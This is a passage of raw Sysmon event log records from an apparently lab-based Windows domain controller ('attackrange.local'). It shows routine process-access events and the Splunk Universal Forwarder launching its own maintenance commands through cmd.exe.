15:51:20.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002102Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C78-5FA1-5D00-000000008801}3920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002101Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C78-5FA1-5D00-000000008801}3920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002100Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.015{D28789B6-7C78-5FA1-5D00-000000008801}3920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002256Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C79-5FA1-6800-000000008801}3244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002254Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002253Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002252Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002251Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002250Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002249Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002248Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C79-5FA1-6800-000000008801}3244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.253{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C79-5FA1-6800-000000008801}3244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.257{D28789B6-7C79-5FA1-6800-000000008801}3244C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002243Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C79-5FA1-6700-000000008801}4048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002242Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002241Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002239Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002238Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002237Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002236Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002235Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002234Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM